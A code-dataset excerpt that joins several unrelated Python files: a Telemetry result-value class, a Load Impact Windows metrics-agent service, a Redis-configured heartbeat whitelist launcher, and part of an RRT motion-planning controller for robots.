[ScalarValue(page, 'a', 1), ScalarValue(page, 'a', 2)]
and it might produce
ListOfScalarValues(page, 'a', [1, 2])
"""
raise NotImplementedError()
@classmethod
def MergeLikeValuesFromDifferentPages(cls, values,
group_by_name_suffix=False):
"""Combines the provided values into a single compound value.
When a full pageset runs, a single value_name will usually end up getting
collected for multiple pages. For instance, we may end up with
[ScalarValue(page1, 'a', 1),
ScalarValue(page2, 'a', 2)]
This function takes in the values of the same name, but across multiple
pages, and produces a single summary result value. In this instance, it
could produce a ScalarValue(None, 'a', 1.5) to indicate averaging, or even
ListOfScalarValues(None, 'a', [1, 2]) if concatenated output was desired.
Some results are so specific to a page that they make no sense when
aggregated across pages. If merging values of this type across pages is
non-sensical, this method may return None.
If group_by_name_suffix is True, then x.z and y.z are considered to be the
same value and are grouped together. If false, then x.z and y.z are
considered different.
"""
raise NotImplementedError()
def _IsImportantGivenOutputIntent(self, output_context):
if output_context == PER_PAGE_RESULT_OUTPUT_CONTEXT:
return False
elif output_context == COMPUTED_PER_PAGE_SUMMARY_OUTPUT_CONTEXT:
return self.important
elif output_context == SUMMARY_RESULT_OUTPUT_CONTEXT:
return self.important
def GetBuildbotDataType(self, output_context):
"""Returns the buildbot's equivalent data_type.
This should be one of the values accepted by perf_tests_results_helper.py.
"""
raise NotImplementedError()
def GetBuildbotValue(self):
"""Returns the buildbot's equivalent value."""
raise NotImplementedError()
def GetChartAndTraceNameForPerPageResult(self):
chart_name, _ = _ConvertValueNameToChartAndTraceName(self.name)
trace_name = self.page.display_name
return chart_name, trace_name
@property
def name_suffix(self):
"""Returns the string after a . in the name, or the full name otherwise."""
if '.' in self.name:
return self.name.split('.', 1)[1]
else:
return self.name
def GetChartAndTraceNameForComputedSummaryResult(
self, trace_tag):
chart_name, trace_name = (
_ConvertValueNameToChartAndTraceName(self.name))
if trace_tag:
return chart_name, trace_name + trace_tag
else:
return chart_name, trace_name
def GetRepresentativeNumber(self):
"""Gets a single scalar value that best-represents this value.
Returns None if not possible.
"""
raise NotImplementedError()
def GetRepresentativeString(self):
"""Gets a string value that best-represents this value.
Returns None if not possible.
"""
raise NotImplementedError()
@staticmethod
def GetJSONTypeName():
"""Gets the typename for serialization to JSON using AsDict."""
raise NotImplementedError()
def AsDict(self):
"""Pre-serializes a value to a dict for output as JSON."""
return self._AsDictImpl()
def _AsDictImpl(self):
d = {
'name': self.name,
'type': self.GetJSONTypeName(),
'units': self.units,
'important': self.important
}
if self.description:
d['description'] = self.description
if self.interaction_record:
d['interaction_record'] = self.interaction_record
if self.page:
d['page_id'] = self.page.id
return d
def AsDictWithoutBaseClassEntries(self):
full_dict = self.AsDict()
base_dict_keys = set(self._AsDictImpl().keys())
# Extracts only entries added by the subclass.
return dict([(k, v) for (k, v) in full_dict.iteritems()
if k not in base_dict_keys])
@staticmethod
def FromDict(value_dict, page_dict):
"""Produces a value from a value dict and a page dict.
Value dicts are produced by serialization to JSON, and must be accompanied
by a dict mapping page IDs to pages, also produced by serialization, in
order to be completely deserialized. If deserializing multiple values, use
ListOfValuesFromListOfDicts instead.
value_dict: a dictionary produced by AsDict() on a value subclass.
page_dict: a dictionary mapping IDs to page objects.
"""
return Value.ListOfValuesFromListOfDicts([value_dict], page_dict)[0]
@staticmethod
def ListOfValuesFromListOfDicts(value_dicts, page_dict):
"""Takes a list of value dicts to values.
Given a list of value dicts produced by AsDict, this method
deserializes the dicts given a dict mapping page IDs to pages.
This method performs memoization for deserializing a list of values
efficiently, where FromDict is meant to handle one-offs.
values: a list of value dicts produced by AsDict() on a value subclass.
page_dict: a dictionary mapping IDs to page objects.
"""
value_dir = os.path.dirname(__file__)
value_classes = discover.DiscoverClasses(
value_dir, util.GetTelemetryDir(),
Value, index_by_class_name=True)
value_json_types = dict((value_classes[x].GetJSONTypeName(), x) for x in
value_classes)
values = []
for value_dict in value_dicts:
value_class = value_classes[value_json_types[value_dict['type']]]
assert 'FromDict' in value_class.__dict__, \
'Subclass doesn\'t override FromDict'
values.append(value_class.FromDict(value_dict, page_dict))
return values
@staticmethod
def GetConstructorKwArgs(value_dict, page_dict):
"""Produces constructor arguments from a value dict and a page dict.
Takes a dict parsed from JSON and an index of pages and recovers the
keyword arguments to be passed to the constructor for deserializing the
dict.
value_dict: a dictionary produced by AsDict() on a value subclass.
page_dict: a dictionary mapping IDs to page objects.
"""
d = {
'name': value_dict['name'],
'units': value_dict['units']
}
description = value_dict.get('description', None)
if description:
d['description'] = description
else:
d['description'] = None
page_id = value_dict.get('page_id', None)
if page_id:
d['page'] = page_dict[int(page_id)]
else:
d['page'] = None
d['important'] = False
interaction_record = value_dict.get('interaction_record', None)
if interaction_record:
d['interaction_record'] = interaction_record
else:
d['interaction_record'] = None
return d
def ValueNameFromTraceAndChartName(trace_name, chart_name=None):
"""Mangles a trace name plus optional chart name into a standard string.
A value might just be a bareword name, e.g. numPixels. In that case, its
chart may be None.
But, a value might also be intended for display with other values, in which
case the chart name indicates that grouping. So, you might have
screen.numPixels, screen.resolution, where chartName='screen'.
"""
assert trace_name != 'url', 'The name url cannot be used'
if chart_name:
return '%s.%s' % (chart_name, trace_name)
else:
assert '.' not in trace_name, ('Trace names cannot contain "." with an '
'empty chart_name since this is used to delimit chart_name.trace_name.')
return trace_name
def _ConvertValueNameToChartAndTraceName(value_name):
"""Converts a value_name into the equivalent chart-trace name pair.
Buildbot represents values by the measurement name and an optional trace name,
whereas telemetry represents values with a chart_name.trace_name convention,
where chart_name is optional. This convention is also used by chart_json.
This converts from the telemetry convention to the buildbot convention,
returning a 2-tuple (measurement_name, trace_name).
"""
if '.' in value_name:
return value_name.split('.', 1)
else:
return value_name, value_name
| bsd-3-clause | 4,884,086,111,514,157,000 | 36.172619 | 80 | 0.703283 | false |
loadimpact/loadimpact-server-metrics | li_metrics_agent_service.py | 1 | 2556 | #!/usr/bin/env python
# coding=utf-8
"""
Copyright 2012 Load Impact
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import li_metrics_agent
import threading
import win32service
import win32serviceutil
import win32event
import servicemanager
import sys
__author__ = "Load Impact"
__copyright__ = "Copyright 2012, Load Impact"
__license__ = "Apache License v2.0"
__version__ = "1.1.1"
__email__ = "[email protected]"
class AgentThread(threading.Thread):
def __init__(self):
super(AgentThread, self).__init__()
self.agent_loop = li_metrics_agent.AgentLoop()
def run(self):
self.agent_loop.run()
def stop(self):
self.agent_loop.stop()
class AgentService(win32serviceutil.ServiceFramework):
_svc_name_ = "LoadImpactServerMetricsAgent"
_svc_display_name_ = "Load Impact server metrics agent"
_svc_description_ = ("Agent for collecting and reporting server metrics "
"to loadimpact.com")
# init service framework
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
# listen for a stop request
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
def SvcDoRun(self):
#import servicemanager
rc = None
self.ReportServiceStatus(win32service.SERVICE_RUNNING)
self.agent = AgentThread()
self.agent.start()
# loop until the stop event fires
while rc != win32event.WAIT_OBJECT_0:
# block for 5 seconds and listen for a stop event
rc = win32event.WaitForSingleObject(self.hWaitStop, 1000)
def SvcStop(self):
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
self.agent.stop()
self.agent.join()
win32event.SetEvent(self.hWaitStop)
if __name__ == '__main__':
if len(sys.argv) == 1:
servicemanager.Initialize()
servicemanager.PrepareToHostSingle(AgentService)
servicemanager.StartServiceCtrlDispatcher()
else:
win32serviceutil.HandleCommandLine(AgentService)
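# Typical invocation (editor's assumption, based on the standard pywin32
# HandleCommandLine behaviour): run this script with "install", "start", "stop"
# or "remove" as the argument to manage the Windows service, or with no argument
# when it is launched by the service control manager.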
| apache-2.0 | -4,460,066,151,057,241,600 | 30.170732 | 77 | 0.687402 | false |
alexliyu/CDMSYSTEM | firewall.py | 1 | 1273 | #!/usr/bin/python
# -*- coding:utf-8 -*-
"""
Main program entry point
@author:alex
@date:15-2-13
@time:11:44 AM
@contact:[email protected]
"""
__author__ = 'alex'
import sys
import os
import ConfigParser
import uuid
from subprocess import Popen, PIPE
from utils.heartbeat import HeartBeatManager
from utils.tools import *
PROJECT_PATH = os.path.abspath(os.path.dirname(__file__))
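# Illustrative config.ini layout read by init() below (the section/option names come
# from the cf.get()/cf.getint() calls; the concrete values are editor's placeholders):
#   [REDIS]
#   IP = 127.0.0.1
#   PORT = 6379
#   [LISTENING]
#   IP = 0.0.0.0
#   PORT = 9999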
def init(ini_file=None):
cf = ConfigParser.ConfigParser()
try:
if ini_file:
cf.read(ini_file)
else:
cf.read(os.path.join(PROJECT_PATH, "config.ini"))
redis_host = cf.get("REDIS", "IP")
redis_port = cf.getint("REDIS", "PORT")
listener_host = cf.get("LISTENING", "IP")
listener_port = cf.getint("LISTENING", "PORT")
except Exception, e:
print e
sys.exit(1)
print_info("REDIS端口 %s:%d" % (redis_host, redis_port))
print_info("监听心跳包端口 %s:%d" % (listener_host, listener_port))
print_info("开始运行白名单服务........")
server = HeartBeatManager(redis_host, redis_port, listener_host, listener_port)
server.run()
return True
if __name__ == "__main__":
if len(sys.argv) > 1:
init(sys.argv[1])
else:
init()
| mit | -4,446,706,550,151,536,000 | 21.62963 | 83 | 0.60311 | false |
jadecastro/LTLMoP | src/lib/handlers/motionControl/RRTController.py | 1 | 37133 | #!/usr/bin/env python
"""
===================================================================
RRTController.py - Rapidly-Exploring Random Trees Motion Controller
===================================================================
Uses Rapidly-exploring Random Tree Algorithm to generate paths given the starting position and the goal point.
"""
from numpy import *
from __is_inside import *
import math
import sys,os
from scipy.linalg import norm
from numpy.matlib import zeros
import __is_inside
import time, sys,os
import scipy as Sci
import scipy.linalg
import Polygon, Polygon.IO
import Polygon.Utils as PolyUtils
import Polygon.Shapes as PolyShapes
from math import sqrt, fabs , pi
import random
import thread
import threading
# importing matplotlib to show the path if possible
try:
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import_matplotlib = True
except:
print "matplotlib is not imported. Plotting is disabled"
import_matplotlib = False
class motionControlHandler:
def __init__(self, proj, shared_data,robot_type,max_angle_goal,max_angle_overlap,plotting):
"""
Rapidly-Exploring Random Trees alogorithm motion planning controller
robot_type (int): Which robot is used for execution. BasicSim is 1, ODE is 2, ROS is 3, Nao is 4, Pioneer is 5(default=1)
max_angle_goal (float): The biggest difference in angle between the new node and the goal point that is acceptable. If it is bigger than the max_angle, the new node will not be connected to the goal point. The value should be within 0 to 6.28 = 2*pi. Default set to 6.28 = 2*pi (default=6.28)
max_angle_overlap (float): difference in angle allowed for two nodes overlapping each other. If you don't want any node overlapping with each other, put in 2*pi = 6.28. Default set to 1.57 = pi/2 (default=1.57)
plotting (bool): Check the box to enable plotting. Uncheck to disable plotting (default=True)
"""
        self.system_print       = False       # for debugging: print detailed status messages to the GUI
        self.finish_print       = False       # set to True to print the original finished E and V before trimming the tree
self.orientation_print = False # show the orientation information of the robot
# Get references to handlers we'll need to communicate with
self.drive_handler = proj.h_instance['drive']
self.pose_handler = proj.h_instance['pose']
# Get information about regions
self.proj = proj
self.coordmap_map2lab = proj.coordmap_map2lab
self.coordmap_lab2map = proj.coordmap_lab2map
self.last_warning = 0
self.previous_next_reg = None
# Store the Rapidly-Exploring Random Tress Built
self.RRT_V = None # array containing all the points on the RRT Tree
self.RRT_E = None # array specifying the connection of points on the Tree
self.E_current_column = None # the current column on the tree (to find the current heading point)
self.Velocity = None
self.currentRegionPoly = None
self.nextRegionPoly = None
self.map = {}
self.all = Polygon.Polygon()
        self.trans_matrix = mat([[0,1],[-1,0]])   # transformation matrix for finding the normal to a vector
self.stuck_thres = 20 # threshold for changing the range of sampling omega
# Information about the robot (default set to ODE)
if robot_type not in [1,2,3,4,5]:
robot_type = 1
self.system = robot_type
# Information about maximum turning angle allowed from the latest node to the goal point
if max_angle_goal > 2*pi:
max_angle_goal = 2*pi
if max_angle_goal < 0:
max_angle_goal = 0
self.max_angle_allowed = max_angle_goal
# Information about maximum difference in angle allowed between two overlapping nodes
if max_angle_overlap > 2*pi:
max_angle_overlap = 2*pi
if max_angle_overlap < 0:
max_angle_overlap = 0
self.max_angle_overlap = max_angle_overlap
# Information about whether plotting is enabled.
if plotting is True and import_matplotlib == True:
self.plotting = True
else:
self.plotting = False
# Specify the size of the robot
# 1: basicSim; 2: ODE; 3: ROS 4: Nao; 5: Pioneer
# self.radius: radius of the robot
# self.timestep : number of linear segments to break the curve into for calculation of x, y position
# self.step_size : the length of each step for connection to goal point
# self.velocity : Velocity of the robot in m/s in control space (m/s)
if self.system == 1:
self.radius = 5
self.step_size = 25
self.timeStep = 10
self.velocity = 2 # 1.5
if self.system == 2:
self.radius = 5
self.step_size = 15
self.timeStep = 10
self.velocity = 2 # 1.5
elif self.system == 3:
self.ROSInitHandler = shared_data['ROS_INIT_HANDLER']
self.radius = self.ROSInitHandler.robotPhysicalWidth/2
self.step_size = self.radius*3 #0.2
self.timeStep = 8
self.velocity = self.radius/2 #0.08
elif self.system == 4:
self.radius = 0.15*1.2
            self.step_size = 0.2 #set the step_size for points to be 1/5 of the norm; ORIGINAL = 0.4
self.timeStep = 5
self.velocity = 0.05
elif self.system == 5:
self.radius = 0.15
            self.step_size = 0.2 #set the step_size for points to be 1/5 of the norm; ORIGINAL = 0.4
self.timeStep = 5
self.velocity = 0.05
# Operate_system (int): Which operating system is used for execution.
# Ubuntu and Mac is 1, Windows is 2
if sys.platform in ['win32', 'cygwin']:
self.operate_system = 2
else:
self.operate_system = 1
if self.system_print == True:
print "The operate_system is "+ str(self.operate_system)
# Generate polygon for regions in the map
for region in self.proj.rfi.regions:
self.map[region.name] = self.createRegionPolygon(region)
for n in range(len(region.holeList)): # no of holes
self.map[region.name] -= self.createRegionPolygon(region,n)
# Generate the boundary polygon
for regionName,regionPoly in self.map.iteritems():
self.all += regionPoly
# Start plotting if operating in Windows
if self.operate_system == 2 and self.plotting ==True:
# start using anmination to plot the robot
self.fig = plt.figure()
self.ax = self.fig.add_subplot(111)
self.scope = _Scope(self.ax,self)
thread.start_new_thread(self.jplot,())
def gotoRegion(self, current_reg, next_reg, last=False):
"""
If ``last`` is True, we will move to the center of the destination region.
Returns ``True`` if we've reached the destination region.
"""
if current_reg == next_reg and not last:
# No need to move!
self.drive_handler.setVelocity(0, 0) # So let's stop
return True
# Find our current configuration
pose = self.pose_handler.getPose()
# Check if Vicon has cut out
# TODO: this should probably go in posehandler?
if math.isnan(pose[2]):
print "WARNING: No Vicon data! Pausing."
self.drive_handler.setVelocity(0, 0) # So let's stop
time.sleep(1)
return False
###This part will be run when the robot goes to a new region, otherwise, the original tree will be used.
if not self.previous_next_reg == next_reg:
# Entered a new region. New tree should be formed.
self.nextRegionPoly = self.map[self.proj.rfi.regions[next_reg].name]
self.currentRegionPoly = self.map[self.proj.rfi.regions[current_reg].name]
if self.system_print == True:
print "next Region is " + str(self.proj.rfi.regions[next_reg].name)
print "Current Region is " + str(self.proj.rfi.regions[current_reg].name)
#set to zero velocity before tree is generated
self.drive_handler.setVelocity(0, 0)
if last:
transFace = None
else:
# Determine the mid points on the faces connecting to the next region (one goal point will be picked among all the mid points later in buildTree)
transFace = None
q_gBundle = [[],[]] # list of goal points (midpoints of transition faces)
                face_normal = [[],[]] # normal of the transition faces
for i in range(len(self.proj.rfi.transitions[current_reg][next_reg])):
pointArray_transface = [x for x in self.proj.rfi.transitions[current_reg][next_reg][i]]
transFace = asarray(map(self.coordmap_map2lab,pointArray_transface))
bundle_x = (transFace[0,0] +transFace[1,0])/2 #mid-point coordinate x
bundle_y = (transFace[0,1] +transFace[1,1])/2 #mid-point coordinate y
q_gBundle = hstack((q_gBundle,vstack((bundle_x,bundle_y))))
#find the normal vector to the face
face = transFace[0,:] - transFace[1,:]
distance_face = norm(face)
normal = face/distance_face * self.trans_matrix
face_normal = hstack((face_normal,vstack((normal[0,0],normal[0,1]))))
if transFace is None:
print "ERROR: Unable to find transition face between regions %s and %s. Please check the decomposition (try viewing projectname_decomposed.regions in RegionEditor or a text editor)." % (self.proj.rfi.regions[current_reg].name, self.proj.rfi.regions[next_reg].name)
# Run algorithm to build the Rapid-Exploring Random Trees
self.RRT_V = None
self.RRT_E = None
# For plotting
if self.operate_system == 2:
if self.plotting == True:
self.ax.cla()
else:
self.ax = None
else:
self.ax = None
if self.operate_system == 1 and self.plotting == True:
plt.cla()
self.plotMap(self.map)
plt.plot(pose[0],pose[1],'ko')
self.RRT_V,self.RRT_E,self.E_current_column = self.buildTree(\
[pose[0], pose[1]],pose[2],self.currentRegionPoly, self.nextRegionPoly,q_gBundle,face_normal)
"""
# map the lab coordinates back to pixels
V_tosend = array(mat(self.RRT_V[1:,:])).T
V_tosend = map(self.coordmap_lab2map, V_tosend)
V_tosend = mat(V_tosend).T
s = 'RRT:E'+"["+str(list(self.RRT_E[0]))+","+str(list(self.RRT_E[1]))+"]"+':V'+"["+str(list(self.RRT_V[0]))+","+str(list(V_tosend[0]))+","+str(list(V_tosend[1]))+"]"+':T'+"["+str(list(q_gBundle[0]))+","+str(list(q_gBundle[1]))+"]"
#print s
"""
# Run algorithm to find a velocity vector (global frame) to take the robot to the next region
self.Velocity = self.getVelocity([pose[0], pose[1]], self.RRT_V,self.RRT_E)
#self.Node = self.getNode([pose[0], pose[1]], self.RRT_V,self.RRT_E)
self.previous_next_reg = next_reg
# Pass this desired velocity on to the drive handler
self.drive_handler.setVelocity(self.Velocity[0,0], self.Velocity[1,0], pose[2])
#self.drive_handler.setVelocity(self.Node[0,0], self.Node[1,0], pose[2])
RobotPoly = Polygon.Shapes.Circle(self.radius,(pose[0],pose[1]))
# check if robot is inside the current region
departed = not self.currentRegionPoly.overlaps(RobotPoly)
arrived = self.nextRegionPoly.covers(RobotPoly)
if departed and (not arrived) and (time.time()-self.last_warning) > 0.5:
# Figure out what region we think we stumbled into
for r in self.proj.rfi.regions:
pointArray = [self.coordmap_map2lab(x) for x in r.getPoints()]
vertices = mat(pointArray).T
if is_inside([pose[0], pose[1]], vertices):
print "I think I'm in " + r.name
print pose
break
self.last_warning = time.time()
#print "arrived:"+str(arrived)
return arrived
def createRegionPolygon(self,region,hole = None):
"""
This function takes in the region points and make it a Polygon.
"""
if hole == None:
pointArray = [x for x in region.getPoints()]
else:
pointArray = [x for x in region.getPoints(hole_id = hole)]
pointArray = map(self.coordmap_map2lab, pointArray)
regionPoints = [(pt[0],pt[1]) for pt in pointArray]
formedPolygon= Polygon.Polygon(regionPoints)
return formedPolygon
def getVelocity(self,p, V, E, last=False):
"""
This function calculates the velocity for the robot with RRT.
The inputs are (given in order):
p = the current x-y position of the robot
E = edges of the tree (2 x No. of nodes on the tree)
V = points of the tree (2 x No. of vertices)
last = True, if the current region is the last region
= False, if the current region is NOT the last region
"""
pose = mat(p).T
#dis_cur = distance between current position and the next point
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
heading = E[1,self.E_current_column] # index of the current heading point on the tree
if norm(dis_cur) < 1.5*self.radius: # go to next point
if not heading == shape(V)[1]-1:
self.E_current_column = self.E_current_column + 1
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
#else:
# dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- vstack((V[1,E[0,self.E_current_column]],V[2,E[0,self.E_current_column]]))
Vel = zeros([2,1])
Vel[0:2,0] = dis_cur/norm(dis_cur)*0.5 #TUNE THE SPEED LATER
return Vel
def getNode(self,p, V, E, last=False):
"""
This function calculates the velocity for the robot with RRT.
The inputs are (given in order):
p = the current x-y position of the robot
E = edges of the tree (2 x No. of nodes on the tree)
V = points of the tree (2 x No. of vertices)
last = True, if the current region is the last region
= False, if the current region is NOT the last region
"""
pose = mat(p).T
#dis_cur = distance between current position and the next point
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
heading = E[1,self.E_current_column] # index of the current heading point on the tree
if norm(dis_cur) < 1.5*self.radius: # go to next point
if not heading == shape(V)[1]-1:
self.E_current_column = self.E_current_column + 1
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
Node = zeros([2,1])
Node[0,0] = V[1,E[1,self.E_current_column]]
Node[1,0] = V[2,E[1,self.E_current_column]]
#Vel[0:2,0] = dis_cur/norm(dis_cur)*0.5 #TUNE THE SPEED LATER
return Node
def buildTree(self,p,theta,regionPoly,nextRegionPoly,q_gBundle,face_normal, last=False):
"""
This function builds the RRT tree.
p : x,y position of the robot
theta : current orientation of the robot
regionPoly : current region polygon
nextRegionPoly : next region polygon
q_gBundle : coordinates of q_goals that the robot can reach
face_normal : the normal vector of each face corresponding to each goal point in q_gBundle
"""
q_init = mat(p).T
V = vstack((0,q_init))
theta = self.orientation_bound(theta)
V_theta = array([theta])
#!!! CONTROL SPACE: generate a list of omega for random sampling
        omegaLowerBound = -math.pi/20     # lower bound for the value of omega
        omegaUpperBound = math.pi/20      # upper bound for the value of omega
omegaNoOfSteps = 20
self.omega_range = linspace(omegaLowerBound,omegaUpperBound,omegaNoOfSteps)
self.omega_range_escape = linspace(omegaLowerBound*4,omegaUpperBound*4,omegaNoOfSteps*4) # range used when stuck > stuck_thres
regionPolyOld = Polygon.Polygon(regionPoly)
regionPoly += PolyShapes.Circle(self.radius*2.5,(q_init[0,0],q_init[1,0]))
# check faces of the current region for goal points
E = [[],[]] # the tree matrix
Other = [[],[]]
        path = False # set to True once a path to a goal point has been formed
stuck = 0 # count for changing the range of sampling omega
append_after_latest_node = False # append new nodes to the latest node
if self.system_print == True:
print "plotting in buildTree is " + str(self.plotting)
if self.plotting == True:
if not plt.isinteractive():
plt.ion()
plt.hold(True)
while not path:
#step -1: try connection to q_goal (generate path to goal)
i = 0
if self.system_print == True:
print "Try Connection to the goal points"
# pushing possible q_goals into the current region (ensure path is covered by the current region polygon)
q_pass = [[],[],[]]
q_pass_dist = []
q_gBundle = mat(q_gBundle)
face_normal = mat(face_normal)
while i < q_gBundle.shape[1]:
q_g_original = q_gBundle[:,i]
q_g = q_gBundle[:,i]+face_normal[:,i]*1.5*self.radius ##original 2*self.radius
#q_g = q_gBundle[:,i]+(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])*1.5*self.radius ##original 2*self.radius
if not regionPolyOld.isInside(q_g[0],q_g[1]):
#q_g = q_gBundle[:,i]-(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])*1.5*self.radius ##original 2*self.radius
q_g = q_gBundle[:,i]-face_normal[:,i]*1.5*self.radius ##original 2*self.radius
#forming polygon for path checking
EdgePolyGoal = PolyShapes.Circle(self.radius,(q_g[0,0],q_g[1,0])) + PolyShapes.Circle(self.radius,(V[1,shape(V)[1]-1],V[2:,shape(V)[1]-1]))
EdgePolyGoal = PolyUtils.convexHull(EdgePolyGoal)
dist = norm(q_g - V[1:,shape(V)[1]-1])
#check connection to goal
connect_goal = regionPoly.covers(EdgePolyGoal) #check coverage of path from new point to goal
# compare orientation difference
thetaPrev = V_theta[shape(V)[1]-1]
theta_orientation = abs(arctan((q_g[1,0]- V[2,shape(V)[1]-1])/(q_g[0,0]- V[1,shape(V)[1]-1])))
if q_g[1,0] > V[2,shape(V)[1]-1]:
if q_g[0,0] < V[1,shape(V)[1]-1]: # second quadrant
theta_orientation = pi - theta_orientation
elif q_g[0,0] > V[1,shape(V)[1]-1]: # first quadrant
theta_orientation = theta_orientation
elif q_g[1,0] < V[2,shape(V)[1]-1]:
if q_g[0,0] < V[1,shape(V)[1]-1]: #third quadrant
theta_orientation = pi + theta_orientation
elif q_g[0,0] > V[1,shape(V)[1]-1]: # foruth quadrant
theta_orientation = 2*pi - theta_orientation
# check the angle between vector(new goal to goal_original ) and vector( latest node to new goal)
Goal_to_GoalOriginal = q_g_original - q_g
LatestNode_to_Goal = q_g - V[1:,shape(V)[1]-1]
Angle_Goal_LatestNode= arccos(vdot(array(Goal_to_GoalOriginal), array(LatestNode_to_Goal))/norm(Goal_to_GoalOriginal)/norm(LatestNode_to_Goal))
# if connection to goal can be established and the max change in orientation of the robot is smaller than max_angle, tree is said to be completed.
if self.orientation_print == True:
print "theta_orientation is " + str(theta_orientation)
print "thetaPrev is " + str(thetaPrev)
print "(theta_orientation - thetaPrev) is " + str(abs(theta_orientation - thetaPrev))
print "self.max_angle_allowed is " + str(self.max_angle_allowed)
print "abs(theta_orientation - thetaPrev) < self.max_angle_allowed" + str(abs(theta_orientation - thetaPrev) < self.max_angle_allowed)
print"Goal_to_GoalOriginal: " + str( array(Goal_to_GoalOriginal)) + "; LatestNode_to_Goal: " + str( array(LatestNode_to_Goal))
print vdot(array(Goal_to_GoalOriginal), array(LatestNode_to_Goal))
print "Angle_Goal_LatestNode" + str(Angle_Goal_LatestNode)
if connect_goal and (abs(theta_orientation - thetaPrev) < self.max_angle_allowed) and (Angle_Goal_LatestNode < self.max_angle_allowed):
path = True
q_pass = hstack((q_pass,vstack((i,q_g))))
q_pass_dist = hstack((q_pass_dist,dist))
i = i + 1
if self.system_print == True:
print "checked goal points"
self.E = E
self.V = V
# connection to goal has established
# Obtain the closest goal point that path can be formed.
if path:
if shape(q_pass_dist)[0] == 1:
cols = 0
else:
(cols,) = nonzero(q_pass_dist == min(q_pass_dist))
cols = asarray(cols)[0]
q_g = q_pass[1:,cols]
"""
q_g = q_g-(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])*3*self.radius #org 3
if not nextRegionPoly.isInside(q_g[0],q_g[1]):
q_g = q_g+(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])*6*self.radius #org 3
"""
if self.plotting == True :
if self.operate_system == 1:
plt.suptitle('Rapidly-exploring Random Tree', fontsize=12)
plt.xlabel('x')
plt.ylabel('y')
if shape(V)[1] <= 2:
plt.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b')
else:
plt.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b')
plt.plot(q_g[0,0],q_g[1,0],'ko')
plt.figure(1).canvas.draw()
else:
BoundPolyPoints = asarray(PolyUtils.pointList(regionPoly))
self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],'k')
if shape(V)[1] <= 2:
self.ax.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b')
else:
self.ax.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b')
self.ax.plot(q_g[0,0],q_g[1,0],'ko')
# trim the path connecting current node to goal point into pieces if the path is too long now
numOfPoint = floor(norm(V[1:,shape(V)[1]-1]- q_g)/self.step_size)
if numOfPoint < 3:
numOfPoint = 3
x = linspace( V[1,shape(V)[1]-1], q_g[0,0], numOfPoint )
y = linspace( V[2,shape(V)[1]-1], q_g[1,0], numOfPoint )
for i in range(x.shape[0]):
if i != 0:
V = hstack((V,vstack((shape(V)[1],x[i],y[i]))))
E = hstack((E,vstack((shape(V)[1]-2,shape(V)[1]-1))))
#push the goal point to the next region
q_g = q_g+face_normal[:,q_pass[0,cols]]*3*self.radius ##original 2*self.radius
if not nextRegionPoly.isInside(q_g[0],q_g[1]):
q_g = q_g-face_normal[:,q_pass[0,cols]]*6*self.radius ##original 2*self.radius
V = hstack((V,vstack((shape(V)[1],q_g[0,0],q_g[1,0]))))
E = hstack((E,vstack((shape(V)[1]-2 ,shape(V)[1]-1))))
if self.plotting == True :
if self.operate_system == 1:
plt.plot(q_g[0,0],q_g[1,0],'ko')
plt.plot(( V[1,shape(V)[1]-1],V[1,shape(V)[1]-2]),( V[2,shape(V)[1]-1],V[2,shape(V)[1]-2]),'b')
plt.figure(1).canvas.draw()
else:
self.ax.plot(q_g[0,0],q_g[1,0],'ko')
self.ax.plot(( V[1,shape(V)[1]-1],V[1,shape(V)[1]-2]),( V[2,shape(V)[1]-1],V[2,shape(V)[1]-2]),'b')
# path is not formed, try to append points onto the tree
if not path:
# connection_to_tree : connection to the tree is successful
if append_after_latest_node:
V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree = self.generateNewNode(V,V_theta,E,Other,regionPoly,stuck, append_after_latest_node)
else:
connection_to_tree = False
while not connection_to_tree:
V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree = self.generateNewNode (V,V_theta,E,Other,regionPoly,stuck)
if self.finish_print:
print 'Here is the V matrix:', V, 'Here is the E matrix:',E
print >>sys.__stdout__, 'Here is the V matrix:\n', V, '\nHere is the E matrix:\n',E
#B: trim to a single path
single = 0
while single == 0:
trim = 0
for j in range(shape(V)[1]-3):
(row,col) = nonzero(E == j+1)
if len(col) == 1:
E = delete(E, col[0], 1)
trim = 1
if trim == 0:
single = 1
#### plot with matplotlib
if self.plotting ==True :
if self.operate_system == 1:
plt.plot(V[1,:],V[2,:],'b')
for i in range(shape(E)[1]):
